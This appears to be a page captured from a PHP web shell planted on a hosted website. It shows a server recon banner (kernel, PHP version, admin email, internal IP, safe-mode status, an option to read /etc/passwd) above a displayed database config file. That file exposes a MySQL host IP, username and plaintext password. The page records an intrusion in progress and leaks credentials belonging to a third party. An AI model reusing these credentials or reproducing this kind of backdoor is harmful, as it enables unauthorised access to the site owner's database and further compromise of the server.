Uname : Linux hlpi1ws-c319s08.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64PHP Version : 5.3.29Server Admin : postmaster@www.giancio.comServer IP : 192.168.3.110 Your IP : 3.133.141.175Safe Mode : Safe Mode is OFFRead etc/passwd : Disabled Functions : PHP INFO
Current File : /web/htdocs/www.giancio.com/home/include/db_en.php
<?
$host='62.149.150.104';
$user='Sql292183';
$pass='2782c6ef';
$db='Sql292183_4';
$conn=mysql_connect($host,$user,$pass) or die('Database non raggiungibile');
$miodb=mysql_select_db($db,$conn) or die('Non riesci a selezionare il db');
?>